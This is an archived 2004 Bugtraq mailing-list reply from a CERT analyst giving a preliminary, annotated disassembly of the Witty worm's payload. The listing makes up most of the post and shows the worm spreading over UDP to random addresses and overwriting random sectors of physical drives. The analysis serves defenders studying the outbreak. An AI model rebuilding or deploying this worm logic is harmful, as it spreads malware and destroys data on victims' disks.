lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <405C81AF.2030900@renater.fr>
Date: Sat, 20 Mar 2004 18:38:55 +0100
From: Kostya Kortchinsky <kostya.kortchinsky@...ater.fr>
To: bugtraq@...urityfocus.com
Subject: Re: Any dissasemblies of the Witty worm yet?



Here is some preliminary work, I don't claim it to be exact, since
the API calls are guessed at the moment (I still have to get BlackICE),
but it should give a pretty good idea on how the thing work.

The WriteFile might be ReadFile (which is the way Symantec sees it in
their analysis), but in my opinion the GENERIC_WRITE flag (and the fact
the memory at 0x5e000000 might be code section, then not writeable)
makes me think it writes arbitrary places of random physical disks -
with the consequences one can imagine.

Correct me if I am wrong, I would like to receive feedback about this.

Regards,

Kostya Kortchinsky
CERT RENATER

Nicholas Weaver wrote:

> 	Has anyone done a dissassembly of the "Witty" worm yet?  
> 
> http://isc.incidents.org/diary.html?date=2004-03-20
> http://securityresponse.symantec.com/avcenter/venc/data/w32.witty.worm.html
> 
> 	using the 
> http://seclists.org/lists/bugtraq/2004/Mar/0181.html
> 	recent bug in BlackICE/RealSecure?
> 
> 	We are seeing a lot of activity from this worm, although even
> a small infection would generate a LOT of traffic (a side-effect of
> bandwidth-limited worms, such as single-packet UDP worms).
> 
> 	Thanks.
> 

seg000:000000D1                   ; 
---------------------------------------------------------------------------
seg000:000000D1
seg000:000000D1                   loc_D1: 
   ; CODE XREF: seg000:000002ABj
seg000:000000D1 89 E7                             mov     edi, esp
seg000:000000D3 8B 7F 14                          mov     edi, [edi+14h]
seg000:000000D6 83 C7 08                          add     edi, 8
seg000:000000D9 81 C4 E8 FD FF FF                 add     esp, 0FFFFFDE8h
seg000:000000DF 31 C9                             xor     ecx, ecx
seg000:000000E1 66 B9 33 32                       mov     cx, 3233h 
   ; 32
seg000:000000E5 51                                push    ecx
seg000:000000E6 68 77 73 32 5F                    push    5F327377h 
   ; ws2_
seg000:000000EB 54                                push    esp
seg000:000000EC                                   db      3Eh
seg000:000000EC 3E FF 15 9C 40 0D+                call    dword ptr 
ds:5E0D409Ch ; Probably LoadLibrary
seg000:000000F3 89 C3                             mov     ebx, eax
seg000:000000F5 31 C9                             xor     ecx, ecx
seg000:000000F7 66 B9 65 74                       mov     cx, 7465h 
   ; et
seg000:000000FB 51                                push    ecx
seg000:000000FC 68 73 6F 63 6B                    push    6B636F73h 
   ; sock
seg000:00000101 54                                push    esp
seg000:00000102 53                                push    ebx
seg000:00000103                                   db      3Eh
seg000:00000103 3E FF 15 98 40 0D+                call    dword ptr 
ds:5E0D4098h ; Probably GetProcAddress
seg000:0000010A 6A 11                             push    11h 
   ; IPPROTO_UDP
seg000:0000010C 6A 02                             push    2 
   ; SOCK_DGRAM
seg000:0000010E 6A 02                             push    2 
   ; AF_INET
seg000:00000110 FF D0                             call    eax 
   ; socket()
seg000:00000112 89 C6                             mov     esi, eax
seg000:00000114 31 C9                             xor     ecx, ecx
seg000:00000116 51                                push    ecx
seg000:00000117 68 62 69 6E 64                    push    646E6962h 
   ; bind
seg000:0000011C 54                                push    esp
seg000:0000011D 53                                push    ebx
seg000:0000011E                                   db      3Eh
seg000:0000011E 3E FF 15 98 40 0D+                call    dword ptr 
ds:5E0D4098h ; Probably GetProcAddress
seg000:00000125 31 C9                             xor     ecx, ecx
seg000:00000127 51                                push    ecx
seg000:00000128 51                                push    ecx
seg000:00000129 51                                push    ecx 
   ; sin.sin_addr.s_addr = INADDR_ANY
seg000:0000012A 81 E9 FE FF F0 5F                 sub     ecx, 5FF0FFFEh 
  ; 0xa00f0002
seg000:00000130 51                                push    ecx 
   ; sin.sin_family = AF_INET
seg000:00000130 
   ; sin.sin_port = htons(4000)
seg000:00000131 89 E1                             mov     ecx, esp
seg000:00000133 6A 10                             push    10h 
   ; sizeof(struct sockaddr)
seg000:00000135 51                                push    ecx 
   ; &sin
seg000:00000136 56                                push    esi 
   ; s
seg000:00000137 FF D0                             call    eax 
   ; bind()
seg000:00000139 31 C9                             xor     ecx, ecx
seg000:0000013B 66 B9 74 6F                       mov     cx, 6F74h 
   ; to
seg000:0000013F 51                                push    ecx
seg000:00000140 68 73 65 6E 64                    push    646E6573h 
   ; send
seg000:00000145 54                                push    esp
seg000:00000146 53                                push    ebx
seg000:00000147                                   db      3Eh
seg000:00000147 3E FF 15 98 40 0D+                call    dword ptr 
ds:5E0D4098h ; Probably GetProcAddress
seg000:0000014E 89 C3                             mov     ebx, eax
seg000:00000150 83 C4 3C                          add     esp, 3Ch
seg000:00000153
seg000:00000153                   loc_153: 
   ; CODE XREF: seg000:000002A2j
seg000:00000153 31 C9                             xor     ecx, ecx
seg000:00000155 51                                push    ecx
seg000:00000156 68 65 6C 33 32                    push    32336C65h 
   ; el32
seg000:0000015B 68 6B 65 72 6E                    push    6E72656Bh 
   ; kern
seg000:00000160 54                                push    esp
seg000:00000161                                   db      3Eh
seg000:00000161 3E FF 15 9C 40 0D+                call    dword ptr 
ds:5E0D409Ch ; Probably LoadLibrary
seg000:00000168 31 C9                             xor     ecx, ecx
seg000:0000016A 51                                push    ecx
seg000:0000016B 68 6F 75 6E 74                    push    746E756Fh 
   ; ount
seg000:00000170 68 69 63 6B 43                    push    436B6369h 
   ; ickC
seg000:00000175 68 47 65 74 54                    push    54746547h 
   ; GetT
seg000:0000017A 54                                push    esp
seg000:0000017B 50                                push    eax
seg000:0000017C                                   db      3Eh
seg000:0000017C 3E FF 15 98 40 0D+                call    dword ptr 
ds:5E0D4098h ; Probably GetProcAddress
seg000:00000183 FF D0                             call    eax 
   ; GetTickCount()
seg000:00000185 89 C5                             mov     ebp, eax
seg000:00000187 83 C4 1C                          add     esp, 1Ch
seg000:0000018A 31 C9                             xor     ecx, ecx
seg000:0000018C 81 E9 E0 B1 FF FF                 sub     ecx, 
0FFFFB1E0h ; 0x4e20
seg000:00000192
seg000:00000192                   loc_192: 
   ; CODE XREF: seg000:000001F8j
seg000:00000192 
   ; seg000:00000255j
seg000:00000192 51                                push    ecx
seg000:00000193 31 C0                             xor     eax, eax
seg000:00000195 2D 03 BC FC FF                    sub     eax, 
0FFFCBC03h ; 0x343fd
seg000:0000019A F7 E5                             mul     ebp
seg000:0000019C 2D 3D 61 D9 FF                    sub     eax, 
0FFD9613Dh ; 0x269ec3
seg000:000001A1 89 C1                             mov     ecx, eax 
   ; rand() function, without the 0x7fff mask, shift coming afterwards
seg000:000001A1 
   ; srand() done with GetTickCount()
seg000:000001A3 31 C0                             xor     eax, eax
seg000:000001A5 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001AA F7 E1                             mul     ecx
seg000:000001AC 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001B1 89 C5                             mov     ebp, eax
seg000:000001B3 31 D2                             xor     edx, edx
seg000:000001B5 52                                push    edx
seg000:000001B6 52                                push    edx
seg000:000001B7 C1 E9 10                          shr     ecx, 10h
seg000:000001BA 66 89 C8                          mov     ax, cx
seg000:000001BD 50                                push    eax 
   ; to.sin_addr.s_addr = (rand() << 16) | rand()
seg000:000001BE 31 C0                             xor     eax, eax
seg000:000001C0 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001C5 F7 E5                             mul     ebp
seg000:000001C7 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001CC 89 C5                             mov     ebp, eax
seg000:000001CE 30 E4                             xor     ah, ah
seg000:000001D0 B0 02                             mov     al, 2
seg000:000001D2 50                                push    eax 
   ; to.sin_family = AF_INET
seg000:000001D2 
   ; to.sin_port = rand()
seg000:000001D3 89 E0                             mov     eax, esp
seg000:000001D5 6A 10                             push    10h 
   ; sizeof(struct sockaddr)
seg000:000001D7 50                                push    eax 
   ; &to
seg000:000001D8 31 C0                             xor     eax, eax
seg000:000001DA 50                                push    eax 
   ; flags
seg000:000001DB 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:000001E0 F7 E5                             mul     ebp
seg000:000001E2 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:000001E7 89 C5                             mov     ebp, eax
seg000:000001E9 C1 E8 17                          shr     eax, 17h
seg000:000001EC 80 C4 03                          add     ah, 3
seg000:000001EF 50                                push    eax 
   ; len = 0x300 + (rand() >> 7)
seg000:000001F0 57                                push    edi 
   ; buf
seg000:000001F1 56                                push    esi 
   ; s
seg000:000001F2 FF D3                             call    ebx 
   ; sendto()
seg000:000001F4 83 C4 10                          add     esp, 10h
seg000:000001F7 59                                pop     ecx
seg000:000001F8 E2 98                             loop    loc_192
seg000:000001FA 31 C0                             xor     eax, eax
seg000:000001FC 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:00000201 F7 E5                             mul     ebp
seg000:00000203 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:00000208 89 C5                             mov     ebp, eax
seg000:0000020A C1 E8 10                          shr     eax, 10h
seg000:0000020D 80 E4 07                          and     ah, 7
seg000:00000210 80 CC 30                          or      ah, 30h 
   ; 0x30 | (rand() & 7)
seg000:00000213 B0 45                             mov     al, 45h ; 'E' 
   ; E
seg000:00000215 50                                push    eax
seg000:00000216 68 44 52 49 56                    push    56495244h 
   ; DRIV
seg000:0000021B 68 49 43 41 4C                    push    4C414349h 
   ; ICAL
seg000:00000220 68 50 48 59 53                    push    53594850h 
   ; PHYS
seg000:00000225 68 5C 5C 2E 5C                    push    5C2E5C5Ch 
   ; \\.\
seg000:00000225 
   ; we get here \\.\PHYSICALDRIVE0 to \\.\PHYSICALDRIVE7
seg000:0000022A 89 E0                             mov     eax, esp
seg000:0000022C 31 C9                             xor     ecx, ecx
seg000:0000022E 51                                push    ecx 
   ; NULL
seg000:0000022F B2 20                             mov     dl, 20h ; ' '
seg000:00000231 C1 E2 18                          shl     edx, 18h
seg000:00000234 52                                push    edx 
   ; FILE_FLAG_NO_BUFFERING (0x20000000)
seg000:00000235 6A 03                             push    3 
   ; OPEN_EXISTING
seg000:00000237 51                                push    ecx 
   ; NULL
seg000:00000238 6A 03                             push    3 
   ; FILE_SHARE_READ | FILE_SHARE_WRITE
seg000:0000023A D1 E2                             shl     edx, 1
seg000:0000023C 52                                push    edx 
   ; GENERIC_WRITE (0x40000000)
seg000:0000023D 50                                push    eax 
   ; lpFileName
seg000:0000023E                                   db      3Eh
seg000:0000023E 3E FF 15 DC 40 0D+                call    dword ptr 
ds:5E0D40DCh ; Probably CreateFile
seg000:00000245 83 C4 14                          add     esp, 14h
seg000:00000248 31 C9                             xor     ecx, ecx
seg000:0000024A 81 E9 E0 B1 FF FF                 sub     ecx, 
0FFFFB1E0h ; 0x4e20
seg000:00000250 3D FF FF FF FF                    cmp     eax, 0FFFFFFFFh
seg000:00000255 0F 84 37 FF FF FF                 jz      loc_192
seg000:0000025B 56                                push    esi 
   ; (saving socket)
seg000:0000025C 89 C6                             mov     esi, eax
seg000:0000025E 31 C0                             xor     eax, eax
seg000:00000260 50                                push    eax 
   ; FILE_BEGIN
seg000:00000261 50                                push    eax 
   ; NULL
seg000:00000262 2D 03 BC FC FF                    sub     eax, 0FFFCBC03h
seg000:00000267 F7 E5                             mul     ebp
seg000:00000269 2D 3D 61 D9 FF                    sub     eax, 0FFD9613Dh
seg000:0000026E 89 C5                             mov     ebp, eax
seg000:00000270 D1 E8                             shr     eax, 1
seg000:00000272 66 89 C8                          mov     ax, cx
seg000:00000275 50                                push    eax 
   ; (rand() << 15) | 0x4e20
seg000:00000276 56                                push    esi 
   ; hFile
seg000:00000277                                   db      3Eh
seg000:00000277 3E FF 15 C4 40 0D+                call    dword ptr 
ds:5E0D40C4h ; Probably SetFilePointer
seg000:00000277 5E 
   ; (really not sure about this one)
seg000:0000027E 31 C9                             xor     ecx, ecx
seg000:00000280 51                                push    ecx 
   ; 0
seg000:00000281 89 E2                             mov     edx, esp
seg000:00000283 51                                push    ecx 
   ; NULL
seg000:00000284 52                                push    edx 
   ; lpNumberOfBytesWritten
seg000:00000285 B5 80                             mov     ch, 80h ; 'Ç'
seg000:00000287 D1 E1                             shl     ecx, 1
seg000:00000289 51                                push    ecx 
   ; nNumberOfBytesToWrite (0x10000)
seg000:0000028A B1 5E                             mov     cl, 5Eh ; '^'
seg000:0000028C C1 E1 18                          shl     ecx, 18h
seg000:0000028F 51                                push    ecx 
   ; lpBuffer (0x5e000000)
seg000:00000290 56                                push    esi 
   ; hFile
seg000:00000291                                   db      3Eh
seg000:00000291 3E FF 15 94 40 0D+                call    dword ptr 
ds:5E0D4094h ; Probably WriteFile
seg000:00000298 56                                push    esi 
   ; hObject
seg000:00000299                                   db      3Eh
seg000:00000299 3E FF 15 38 40 0D+                call    dword ptr 
ds:5E0D4038h ; Probably CloseHandle
seg000:000002A0 5E                                pop     esi
seg000:000002A1 5E                                pop     esi 
   ; (restoring socket)
seg000:000002A2 E9 AC FE FF FF                    jmp     loc_153
seg000:000002A2                   ; 
---------------------------------------------------------------------------
seg000:000002A7 63 76 07 5E                       dd 5E077663h
seg000:000002AB                   ; 
---------------------------------------------------------------------------
seg000:000002AB E9 21 FE FF FF                    jmp     loc_D1
seg000:000002AB                   ; 
---------------------------------------------------------------------------


Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ